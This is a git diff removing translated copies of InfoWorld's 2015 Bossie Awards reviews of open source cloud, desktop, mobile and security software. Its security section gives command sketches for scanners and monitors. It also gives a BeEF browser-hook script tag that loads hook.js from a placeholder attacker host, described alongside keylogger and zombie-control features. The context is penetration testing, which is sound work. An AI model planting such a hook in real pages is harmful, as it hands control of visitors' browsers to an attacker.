-Seneca is at heart an implementation of the [actor/message design pattern][21], focused on using Node.js as a switching engine that takes in messages, processes their contents, and sends an appropriate response, either to the message originator or to another service. By focusing on the message patterns that map to business use cases, it’s relatively easy to take Seneca and quickly build a minimum viable product for your application. A plug-in architecture makes it easy to integrate Seneca with other tools and to quickly add functionality to your services.
-
-You can easily add new patterns to your codebase or break existing patterns into separate services as the needs of your application grow or change. One pattern can also call another, allowing quick code reuse. It’s also easy to add Seneca to a message bus, so you can use it as a framework for working with data from Internet of things devices, as all you need to do is define a listening port where JSON data is delivered.
-
-Services may not be persistent, and Seneca gives you the option of using a built-in object relational mapping layer to handle data abstraction, with plug-ins for common databases.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-netcore-aspnet-100613994-orig.jpg)
-
-### .Net Core and ASP.Net vNext ###
-
-Microsoft’s [open-sourcing of .Net][22] is bringing much of the company’s Web platform into the open. The new [.Net Core][23] release runs on Windows, on OS X, and on Linux. Currently migrating from Microsoft’s Codeplex repository to GitHub, .Net Core offers a more modular approach to .Net, allowing you to install the functions you need as you need them.
-
-Currently under development is [ASP.Net 5][24], an open source version of the Web platform, which runs on .Net Core. You can work with it as the basis of Web apps using Microsoft’s MVC 6 framework. There’s also support for the new SignalR libraries, which add support for WebSockets and other real-time communications protocols.
-
-If you’re planning on using Microsoft’s new Nano server, you’ll be writing code against .Net Core, as it’s designed for thin environments. The new DNX, the .Net Execution environment, simplifies deployment of ASP.Net applications on a wide range of platforms, with tools for packaging code and for booting a runtime on a host. Features are added using the NuGet package manager, letting you use only the libraries you want.
-
-Microsoft’s open source .Net is still very young, but there’s a commitment in Redmond to ensure it’s successful. Support in Microsoft’s own next-generation server operating systems means it has a place in both the data center and the cloud.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-glusterfs-100613989-orig.jpg)
-
-### GlusterFS ###
-
-[GlusterFS][25] is a distributed file system. Gluster aggregates various storage servers into one large parallel network file system. You can [even use it in place of HDFS in a Hadoop cluster][26] or in place of an expensive SAN system -- or both. While HDFS is great for Hadoop, having a general-purpose distributed file system that doesn’t require you to transfer data to another location to analyze it is a key advantage.
-
-In an era of commoditized hardware, commoditized computing, and increased performance and latency requirements, buying a big, fat expensive EMC SAN and hoping it fits all of your needs (it won’t) is no longer your sole viable option. GlusterFS was acquired by Red Hat in 2011.
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100613992-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][27]
-
-[Bossie Awards 2015: The best open source application development tools][28]
-
-[Bossie Awards 2015: The best open source big data tools][29]
-
-[Bossie Awards 2015: The best open source data center and cloud software][30]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][31]
-
-[Bossie Awards 2015: The best open source networking and security software][32]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982923/open-source-tools/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.docker.com/docker-machine
-[2]:https://www.docker.com/docker-swarm
-[3]:https://www.docker.com/docker-compose
-[4]:https://coreos.com/
-[5]:http://rancher.com/rancher-os/
-[6]:http://kubernetes.io/
-[7]:https://mesos.apache.org/
-[8]:https://github.com/joyent/sdc
-[9]:https://smartos.org/
-[10]:https://github.com/joyent/sdc-docker
-[11]:https://sensuapp.org/
-[12]:http://prometheus.io/
-[13]:https://www.elastic.co/products/elasticsearch
-[14]:https://www.elastic.co/products/logstash
-[15]:https://www.elastic.co/products/kibana
-[16]:http://www.ansible.com/home
-[17]:https://jenkins-ci.org/
-[18]:https://nodejs.org/en/
-[19]:https://iojs.org/en/
-[20]:http://senecajs.org/
-[21]:http://www.infoworld.com/article/2976422/application-development/how-to-use-actors-in-distributed-applications.html
-[22]:http://www.infoworld.com/article/2846450/microsoft-net/microsoft-open-sources-server-side-net-launches-visual-studio-2015-preview.html
-[23]:https://dotnet.github.io/core/
-[24]:http://www.asp.net/vnext
-[25]:http://www.gluster.org/
-[26]:http://www.gluster.org/community/documentation/index.php/Hadoop
-[27]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[28]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[29]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[30]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[31]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[32]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md b/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md
deleted file mode 100644
index 83b2b24a2e..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md
+++ /dev/null
@@ -1,223 +0,0 @@
-Bossie Awards 2015: The best open source desktop and mobile software
-================================================================================
-InfoWorld's top picks in open source productivity tools, desktop utilities, and mobile apps
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-desktop-mobile-100614439-orig.jpg)
-
-### The best open source desktop and mobile software ###
-
-Open source on the desktop has a long and distinguished history, and many of our Bossie winners in this category go back many years. Packed with features and still improving, some of these tools offer compelling alternatives to pricey commercial software. Others are utilities that we lean on daily for one reason or another -- the can openers and potato peelers of desktop productivity. One or two of them either plug holes in Windows, or they go the distance where Windows falls short.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-libreoffice-100614436-orig.jpg)
-
-### LibreOffice ###
-
-With the major release of version 5 in August, the Document Foundation’s [LibreOffice][1] offers a completely redesigned user interface, better compatibility with Microsoft Office (including good-but-not-great DOCX, XLSX, and PPTX file format support), and significant improvements to Calc, the spreadsheet application.
-
-Set against a turbulent background, the LibreOffice effort split from OpenOffice.org in 2010. In 2011, Oracle announced it would no longer support OpenOffice.org, and handed the trademark to the Apache Software Foundation. Since then, it has become [increasingly clear][2] that LibreOffice is winning the race for developers, features, and users.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-firefox-100614426-orig.jpg)
-
-### Firefox ###
-
-In the battle of the big browsers, [Firefox][3] gets our vote over its longtime open source rival Chromium for two important reasons:
-
-• **Memory use**. Chromium, like its commercial cousin Chrome, has a nasty propensity to glom onto massive amounts of memory.
-
-• **Privacy**. Witness the [recent controversy][4] over Chromium automatically downloading a microphone snooping program to respond to “OK, Google.”
-
-Firefox may not have the most features or the down-to-the-millisecond fastest rendering engine. But it’s solid, stingy with resources, highly extensible, and most of all, it comes with no strings attached. There’s no ulterior data-gathering motive.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-thunderbird-100614433-orig.jpg)
-
-### Thunderbird ###
-
-A longtime favorite email client, Mozilla’s [Thunderbird][5], may be getting a bit long in the tooth, but it’s still supported and showing signs of life. The latest version, 38.2, arrived in August, and there are plans for more development.
-
-Mozilla officially pulled its people off the project back in July 2012, but a hardcore group of volunteers, led by Kent James and the all-volunteer Thunderbird Council, continues to toil away. While you won’t find the latest email innovations in Thunderbird, you will find a solid core of basic functions based on local storage. If having mail in the cloud spooks you, it’s a good, private alternative. And if James goes ahead with his idea of encrypting Thunderbird mail end-to-end, there may be significant new life in the old bird.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-notepad-100614432-orig.jpg)
-
-### Notepad++ ###
-
-If Windows Notepad handles all of your text editing (and source code editing and HTML editing) needs, more power to ya. For Windows users who yearn for a little bit more in a text editor, there’s Don Ho’s [Notepad++][6], which is the editor I turn to, over and over again.
-
-With tabbed views, drag-and-drop, color-coded hints for completing HTML commands, bookmarks, macro recording, shortcut keys, and every text encoding format you’re likely to encounter, Notepad++ takes text to a new level. We get frequent updates, too, with the latest in August.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-vlc-100614435-orig.jpg)
-
-### VLC ###
-
-The stalwart [VLC][7] (formerly known as VideoLan Client) runs almost any kind of media file on almost any platform. Yes, it even works as a remote control on Apple Watch.
-
-The tiled Universal app version for Windows 10, in the Windows Store, draws some criticism for instability and lack of control, but in most cases VLC works, and it works well -- without external codecs. It even supports Blu-ray formats with two new libraries.
-
-The desktop version is a must-have for Windows 10, unless you’re ready to run the advertising gauntlets that are the Universal Groove Music and Movies & TV apps from Microsoft. VLC received a major [feature update][8] in February and a comprehensive bug fix in April.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-7-zip-100614429-orig.jpg)
-
-### 7-Zip ###
-
-Long recognized as the preeminent open source ZIP archive manager for Windows, [7-Zip][9] works like a champ, even on the Windows 10 desktop. Full coverage for RAR files, which can be problematic in Windows, combines with password-protected file creation and support for self-extracting ZIPs. It’s one of those programs that just works.
-
-Yes, it would be nice to get a more modern file picker. Yes, it would be interesting to see a tiled Universal app version. But even without the fancy bells and whistles, 7-Zip deserves a place on every Windows desktop.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-handbrake-100614427-orig.jpg)
-
-### Handbrake ###
-
-If you want to convert your DVDs (or video files in any commonly used format) into a file in some other format, or simply scrape them off a silver coaster, [Handbrake][10] is the way to do it. If you’re a Windows user, Handbrake is almost indispensable, since Microsoft doesn’t believe in ripping DVDs.
-
-Handbrake presents a number of handy presets for optimizing conversions for your target device (iPod, iPad, Android tablet, and so on). It’s simple, and it’s fast. With the latest round of bug fixes released in June, Handbrake’s keeping up on maintenance -- and it works fine on the Windows 10 desktop.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-keepass-100614430-orig.jpg)
-
-### KeePass ###
-
-I’ll confess that I almost gave up on [KeePass][11] because the primary download site goes to Sourceforge. That means you have to be extremely careful which boxes are checked and what you click on (and when) as you attempt to download and install the software. While KeePass itself is 100 percent clean open source (GNU GPL), Sourceforge doesn’t feel so constrained, and its [installers reek of crapware][12].
-
-One of many local-file password storage programs, KeePass distinguishes itself with broad scope, as well as its ability to run on all sorts of platforms, no installation required. KeePass will save not only passwords, but also credit card information and freely structured information. It provides a strong random password generator, and the database itself is locked with AES and Twofish, so nobody’s going to crack it. And it’s kept up to date, with a new stable release last month.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-virtualbox-100614434-orig.jpg)
-
-### VirtualBox ###
-
-With a major release published in July, Oracle’s open source [VirtualBox][13] -- available for Windows, OS X, Linux, even Solaris -- continues to give commercial counterparts VMware Workstation, VMware Fusion, Parallels Desktop, and Microsoft’s Hyper-V a hard run for their money. The Oracle team is still getting the final Windows 10 bugs ironed out, but come to think of it, so is Microsoft.
-
-VirtualBox doesn’t quite match the performance or polish of the VMware and Parallels products, but it’s getting closer. Version 5 brought long-awaited drag-and-drop support, making it easier to move files between VMs and host.
-
-I prefer VirtualBox over Hyper-V because it’s easy to control external devices. In Hyper-V, for example, getting sound to work is a pain in the neck, but in VirtualBox it only takes a click in setup. The shared clipboard between VM and host works wonders. Running speed on both is roughly the same, with a slight advantage to Hyper-V. But managing VirtualBox machines is much easier.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-inkscape-100614428-orig.jpg)
-
-### Inkscape ###
-
-If you stand in awe of the designs created with Adobe Illustrator (or even CorelDraw), take a close look at [Inkscape][14]. Scalable vector images never looked so good.
-
-Version 0.91, released in January, uses a new internal graphics rendering engine called Cairo, sponsored by Google, to make the app run faster and allow for more accurate rendering. Inkscape will read and write SVG, PNG, PDF, even EPS, and many other formats. It can export Flash XML Graphics, HTML5 Canvas, and XAML, among others.
-
-There’s a strong community around Inkscape, and it’s built for easy extensibility. It’s available for Windows, OS X, and Linux.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-keepassdroid-100614431-orig.jpg)
-
-### KeePassDroid ###
-
-Trying to remember all of the passwords we need today is impossible, and creating new ones to meet stringent password policy requirements can be agonizing. A port of KeePass for Android, [KeePassDroid][15] brings sanity-preserving password management to mobile devices.
-
-Like KeePass, KeePassDroid makes creating and accessing passwords easy, requiring you to recall only a single master password. It supports both DES and Twofish algorithms for encrypting all passwords, and it goes a step further by encrypting the entire password database, not only the password fields. Notes and other password-pertinent information are encrypted too.
-
-While KeePassDroid's interface is minimal -- dated, some would say -- it gets the job done with bare-bones efficiency. Need to generate passwords that have certain character sets and lengths? KeePassDroid can do that with ease. With more than a million downloads on the Google Play Store, you could say this app definitely fills a need.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-prey-100615300-orig.jpg)
-
-### Prey ###
-
-Loss or theft of mobile devices is all too common these days. While there are many tools in the enterprise to manage and erase data either misplaced or stolen from an organization, [Prey][16] facilitates the recovery of the phone, laptop, or tablet, and not just the wiping of potentially sensitive information from the device.
-
-Prey is a Web service that works with an open source installed agent for Linux, OS X, Windows, Android, and iOS devices. Prey tracks your lost or stolen device by using either the device's GPS, the native geolocation provided by newer operating systems, or an associated Wi-Fi hotspot to home in on the location.
-
-If your smartphone is lost or stolen, send a text message to the device to activate Prey. For stolen tablets or laptops, use the Prey Project's cloud-based control panel to select the device as missing. The Prey agent on any device can then take a screenshot of the active applications, turn on the camera to catch a thief's image, reset the device to the factory settings, or fully lock down the device.
-
-Should you want to retrieve your lost items, the Prey Project strongly suggests you contact your local police to have them assist you.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-orbot-100615299-orig.jpg)
-
-### Orbot ###
-
-The premier proxy application for Android, [Orbot][17] leverages the volunteer-operated network of virtual tunnels called Tor (The Onion Router) to keep all communications private. Orbot works with companion applications [Orweb][18] for secure Web browsing and [ChatSecure][19] for secure chat. In fact, any Android app that allows its proxy settings to be changed can be secured with Orbot.
-
-One thing to remember about the Tor network is that it's designed for secure, lightweight communications, not for pulling down torrents or watching YouTube videos. Surfing media-rich sites like Facebook can be painfully slow. Your Orbot communications won't be blazing fast, but they will stay private and confidential.
-
--- Victor R. Garza
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-tails-100615301-orig.jpg)
-
-### Tails ###
-
-[Tails][20], or The Amnesic Incognito Live System, is a Linux Live OS that can be booted from a USB stick, DVD, or SD card. It’s often used covertly in the Deep Web to secure traffic when purchasing illicit substances, but it can also be used to avoid tracking, support freedom of speech, circumvent censorship, and promote liberty.
-
-Leveraging Tor (The Onion Router), Tails keeps all communications secure and private and promises to leave no trace on any computer after it’s used. It performs disk encryption with LUKS, protects instant messages with OTR, encrypts Web traffic with the Tor Browser and HTTPS Everywhere, and securely deletes files via Nautilus Wipe. Tails even has an office suite, image editor, and the like.
-
-Now, it's always possible to be traced while using any system if you're not careful, so be vigilant when using Tails and follow good privacy practices, like turning off JavaScript while using Tor. And be aware that Tails isn't necessarily going to be speedy, even over a fiber connection, but that's the price you pay for anonymity.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100614438-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2015 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][21]
-
-[Bossie Awards 2015: The best open source application development tools][22]
-
-[Bossie Awards 2015: The best open source big data tools][23]
-
-[Bossie Awards 2015: The best open source data center and cloud software][24]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][25]
-
-[Bossie Awards 2015: The best open source networking and security software][26]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982630/open-source-tools/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.libreoffice.org/download/libreoffice-fresh/
-[2]:http://lwn.net/Articles/637735/
-[3]:https://www.mozilla.org/en-US/firefox/new/
-[4]:https://nakedsecurity.sophos.com/2015/06/24/not-ok-google-privacy-advocates-take-on-the-chromium-team-and-win/
-[5]:https://www.mozilla.org/en-US/thunderbird/
-[6]:https://notepad-plus-plus.org/
-[7]:http://www.videolan.org/vlc/index.html
-[8]:http://www.videolan.org/press/vlc-2.2.0.html
-[9]:http://www.7-zip.org/
-[10]:https://handbrake.fr/
-[11]:http://keepass.info/
-[12]:http://www.infoworld.com/article/2931753/open-source-software/sourceforge-the-end-cant-come-too-soon.html
-[13]:https://www.virtualbox.org/
-[14]:https://inkscape.org/en/download/windows/
-[15]:http://www.keepassdroid.com/
-[16]:http://preyproject.com/
-[17]:https://www.torproject.org/docs/android.html.en
-[18]:https://guardianproject.info/apps/orweb/
-[19]:https://guardianproject.info/apps/chatsecure/
-[20]:https://tails.boum.org/
-[21]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[22]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[23]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[24]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[25]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[26]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md b/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md
deleted file mode 100644
index 129ce3eff4..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md
+++ /dev/null
@@ -1,162 +0,0 @@
-Bossie Awards 2015: The best open source networking and security software
-================================================================================
-InfoWorld's top picks of the year among open source tools for building, operating, and securing networks
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-net-sec-100614459-orig.jpg)
-
-### The best open source networking and security software ###
-
-BIND, Sendmail, OpenSSH, Cacti, Nagios, Snort -- open source software seems to have been invented for networks, and many of the oldies and goodies are still going strong. Among our top picks in the category this year, you'll find a mix of stalwarts, mainstays, newcomers, and upstarts perfecting the arts of network management, security monitoring, vulnerability assessment, rootkit detection, and much more.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-icinga-100614482-orig.jpg)
-
-### Icinga 2 ###
-
-Icinga began life as a fork of system monitoring application Nagios. [Icinga 2][1] was completely rewritten to give users a modern interface, support for multiple databases, and an API to integrate numerous extensions. With out-of-the-box load balancing, notifications, and configuration, Icinga 2 shortens the time to installation for complex environments. Icinga 2 supports Graphite natively, giving administrators real-time performance graphing without any fuss. But what puts Icinga back on the radar this year is its release of Icinga Web 2, a graphical front end with drag-and-drop customizable dashboards and streamlined monitoring tools.
-
-Administrators can view, filter, and prioritize problems, while keeping track of which actions have already been taken. A new matrix view lets administrators view hosts and services on one page. You can view events over a particular time period or filter incidents to understand which ones need immediate attention. Icinga Web 2 may boast a new interface and zippier performance, but all the usual commands from Icinga Classic and Icinga Web are still available. That means there is no downtime trying to learn a new version of the tool.
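-
-For administrators who want to script against that API, here is a hedged sketch of a query to the Icinga 2 REST API (this assumes a release with the api feature enabled and an API user named "root" with password "icinga"; the host, port, and credentials are illustrative placeholders, not values to keep in production):
-
-    # curl -k -s -u root:icinga 'https://localhost:5665/v1/objects/hosts'
-
-The call returns the monitored host objects as JSON; port 5665 is the API's usual listening port.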
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-zenoss-100614465-orig.jpg)
-
-### Zenoss Core ###
-
-Another open source stalwart, [Zenoss Core][2] gives network administrators a complete, one-stop solution for tracking and managing all of the applications, servers, storage, networking components, virtualization tools, and other elements of an enterprise infrastructure. Administrators can make sure the hardware is running efficiently and take advantage of the modular design to plug in ZenPacks for extended functionality.
-
-Zenoss Core 5, released in February of this year, takes the already powerful tool and improves it further, with an enhanced user interface and expanded dashboard. The Web-based console and dashboards were already highly customizable and dynamic, and the new version now lets administrators mash up multiple component charts onto a single chart. Think of it as the tool for better root cause and cause/effect analysis.
-
-Portlets give additional insights for network mapping, device issues, daemon processes, production states, watch lists, and event views, to name a few. And new HTML5 charts can be exported outside the tool. The Zenoss Control Center allows out-of-band management and monitoring of all Zenoss components. Zenoss Core has new tools for online backup and restore, snapshots and rollbacks, and multihost deployment. Even more important, deployments are faster with full Docker support.
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opennms-100614461-orig.jpg)
-
-### OpenNMS ###
-
-An extremely flexible network management solution, [OpenNMS][3] can handle any network management task, whether it's device management, application performance monitoring, inventory control, or events management. With IPv6 support, a robust alerts system, and the ability to record user scripts to test Web applications, OpenNMS has everything network administrators and testers need. A new mobile dashboard, called OpenNMS Compass, lets networking pros keep an eye on their network even when they're out and about.
-
-The iOS version of the app, which is available on the [iTunes App Store][4], displays outages, nodes, and alarms. The next version will offer additional event details, resource graphs, and information about IP and SNMP interfaces. The Android version, available on [Google Play][5], displays network availability, outages, and alarms on the dashboard, as well as the ability to acknowledge, escalate, or clear alarms. The mobile clients are compatible with OpenNMS Horizon 1.12 or greater and OpenNMS Meridian 2015.1.0 or greater.
-
--- Fahmida Rashid
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-onion-100614460-orig.jpg)
-
-### Security Onion ###
-
-Like an onion, network security monitoring is made of many layers. No single tool will give you visibility into every attack or show you every reconnaissance or foot-printing session on your company network. [Security Onion][6] bundles scores of proven tools into one handy Ubuntu distro that will allow you to see who's inside your network and help keep the bad guys out.
-
-Whether you're taking a proactive approach to network security monitoring or following up on a potential attack, Security Onion can assist. Consisting of sensor, server, and display layers, the Onion combines full network packet capture with network-based and host-based intrusion detection, and it serves up all of the various logs for inspection and analysis.
-
-The star-studded network security toolchain includes Netsniff-NG for packet capture, Snort and Suricata for rules-based network intrusion detection, Bro for analysis-based network monitoring, OSSEC for host intrusion detection, and Sguil, Squert, Snorby, and ELSA (Enterprise Log Search and Archive) for display, analysis, and log management. It’s a carefully vetted collection of tools, all wrapped in a wizard-driven installer and backed by thorough documentation, that can help you get from zero to monitoring as fast as possible.
-
--- Victor R. Garza
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-kali-100614458-orig.jpg)
-
-### Kali Linux ###
-
-The team behind [Kali Linux][7] revamped the popular security Linux distribution this year to make it faster and even more versatile. Kali sports a new 4.0 kernel, improved hardware and wireless driver support, and a snappier interface. The most popular tools are easily accessible from a dock on the side of the screen. The biggest change? Kali Linux is now a rolling distribution, with a continuous stream of software updates. Kali's core system is based on Debian Jessie, and the team will pull packages continuously from Debian Testing, while continuing to add new Kali-flavored features on top.
-
-The distribution still comes jam-packed with tools for penetration testing, vulnerability analysis, security forensics, Web application analysis, wireless networking and assessment, reverse engineering, and exploitation. Now the distribution has an upstream version checking system that will automatically notify users when updates are available for the individual tools. The distribution also features ARM images for a range of devices, including Raspberry Pi, Chromebook, and Odroids, as well as updates to the NetHunter penetration testing platform that runs on Android devices. There are other changes too: Metasploit Community/Pro is no longer included, because Kali 2.0 is not yet [officially supported by Rapid7][8].
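-
-In practice, the rolling model means updates flow through a single apt source. A sketch of the routine, assuming the kali-rolling repository line the project publishes (verify the exact line against the current Kali documentation):
-
-    # echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
-    # apt-get update && apt-get dist-upgrade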
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-openvas-100614462-orig.jpg)
-
-### OpenVAS ###
-
-[OpenVAS][9], the Open Vulnerability Assessment System, is a framework that combines multiple services and tools to offer vulnerability scanning and vulnerability management. The scanner is coupled with a weekly feed of network vulnerability tests, or you can use a feed from a commercial service. The framework includes a command-line interface (so it can be scripted) and an SSL-secured, browser-based interface via the [Greenbone Security Assistant][10]. OpenVAS accommodates various plug-ins for additional functionality. Scans can be scheduled or run on-demand.
-
-Multiple OpenVAS installations can be controlled through a single master, which makes this a scalable vulnerability assessment tool for enterprises. The project is as compatible with standards as can be: Scan results and configurations are stored in a SQL database, where they can be accessed easily by external reporting tools. Client tools access the OpenVAS Manager via the XML-based stateless OpenVAS Management Protocol, so security administrators can extend the functionality of the framework. The software can be installed from packages or source code to run on Windows or Linux, or downloaded as a virtual appliance.
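-
-As a hedged illustration of the scriptable side, the omp client from the openvas-cli package can drive the OpenVAS Manager over OMP (the admin credentials below are placeholders; 9390 is the Manager's customary port):
-
-    # omp -u admin -w admin -h 127.0.0.1 -p 9390 -G
-    # omp -u admin -w admin -h 127.0.0.1 -p 9390 -T
-
-Here -G lists the scan tasks with their status and -T lists the configured scan targets.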
-
--- Matt Sarrel
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-owasp-100614463-orig.jpg)
-
-### OWASP ###
-
-[OWASP][11], the Open Web Application Security Project, is a nonprofit organization with worldwide chapters focused on improving software security. The community-driven organization provides test tools, documentation, training, and almost anything you could imagine that’s related to assessing software security and best practices for developing secure software. Several OWASP projects have become valuable components of many a security practitioner's toolkit:
-
-[ZAP][12], the Zed Attack Proxy Project, is a penetration test tool for finding vulnerabilities in Web applications. One of the design goals of ZAP was to make it easy to use so that developers and functional testers who aren't security experts can benefit from using it. ZAP provides automated scanners and a set of manual test tools.
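-
-ZAP's automated scanner can also run headlessly. A sketch of a quick scan from the command line (the -quickurl and -quickout flags come from the 2.4-era quick-scan support, so verify them against your ZAP version; testsite.example is a placeholder):
-
-    # zap.sh -cmd -quickurl http://testsite.example -quickout /tmp/zap-report.xml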
-
-The Xenotix XSS Exploit Framework is an advanced cross-site scripting vulnerability detection and exploitation framework that runs scans within browser engines to get real-world results. The Xenotix Scanner Module uses three intelligent fuzzers, and it can run through nearly 5,000 distinct XSS payloads. An API lets security administrators extend and customize the exploit toolkit.
-
-[O-Saft][13], or the OWASP SSL advanced forensic tool, is an SSL auditing tool that shows detailed information about SSL certificates and tests SSL connections. This command-line tool can run online or offline to assess SSL security such as ciphers and configurations. O-Saft provides built-in checks for common vulnerabilities, and you can easily extend these through scripting. In May 2015 a simple GUI was added as an optional download.
-
-[OWTF][14], the Offensive Web Testing Framework, is an automated test tool that follows OWASP testing guidelines and the NIST and PTES standards. The framework uses both a Web UI and a CLI, and it probes Web and application servers for common vulnerabilities such as improper configuration and unpatched software.
-
--- Matt Sarrel
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-beef-100614456-orig.jpg)
-
-### BeEF ###
-
-The Web browser has become the most common vector for attacks against clients. [BeEF][15], the Browser Exploitation Framework Project, is a widely used penetration tool to assess Web browser security. BeEF helps you expose the security weaknesses of client systems using client-side attacks launched through the browser. BeEF sets up a malicious website, which security administrators visit from the browser they want to test. BeEF then sends commands to attack the Web browser and use it to plant software on the client machine. Administrators can then launch attacks on the client machine as if they were zombies.
-
-BeEF comes with commonly used modules like a key logger, a port scanner, and a Web proxy, plus you can write your own modules or send commands directly to the zombified test machine. BeEF comes with a handful of demo Web pages to help you get started and makes it very easy to write additional Web pages and attack modules so you can customize testing to your environment. BeEF is a valuable test tool for assessing browser and endpoint security and for learning how browser-based attacks are launched. Use it to put together a demo to show your users how malware typically infects client devices.
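-
-A hedged sketch of a basic test session using BeEF's stock defaults (the console traditionally listens on port 3000; confirm the paths against your install):
-
-    # cd beef && ./beef
-    # firefox http://127.0.0.1:3000/ui/panel &
-
-The test page your target browser visits simply embeds the hook script, for example `<script src="http://beef-host:3000/hook.js"></script>`, where beef-host is a placeholder for your BeEF machine.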
-
--- Matt Sarrel
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-unhide-100614464-orig.jpg)
-
-### Unhide ###
-
-[Unhide][16] is a forensic tool that locates open TCP/UDP ports and hidden processes on UNIX, Linux, and Windows. Hidden ports and processes can be the result of rootkit or LKM (loadable kernel module) activity. Rootkits can be difficult to find and remove because they are designed to be stealthy, hiding themselves from the OS and user. A rootkit can use LKMs to hide its processes or impersonate other processes, allowing it to run on machines undiscovered for a long time. Unhide can provide the assurance that administrators need to know their systems are clean.
-
-Unhide is really two separate scripts: one for processes and one for ports. The tool interrogates running processes, threads, and open ports and compares this info to what's registered with the system as active, reporting discrepancies. Unhide and WinUnhide are extremely lightweight scripts that run from the command line to produce text output. They're not pretty, but they are extremely useful. Unhide is also included in the [Rootkit Hunter][17] project.
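-
-A minimal sketch of a typical run, assuming the unhide package is installed (run as root):
-
-    # unhide proc
-    # unhide sys
-    # unhide-tcp
-
-The proc test compares /proc against ps output, sys cross-checks processes via system calls, and unhide-tcp flags TCP/UDP ports that are in use but missing from netstat's report.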
-
--- Matt Sarrel
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100614457-orig.jpg)
-
-### Read about more open source winners ###
-
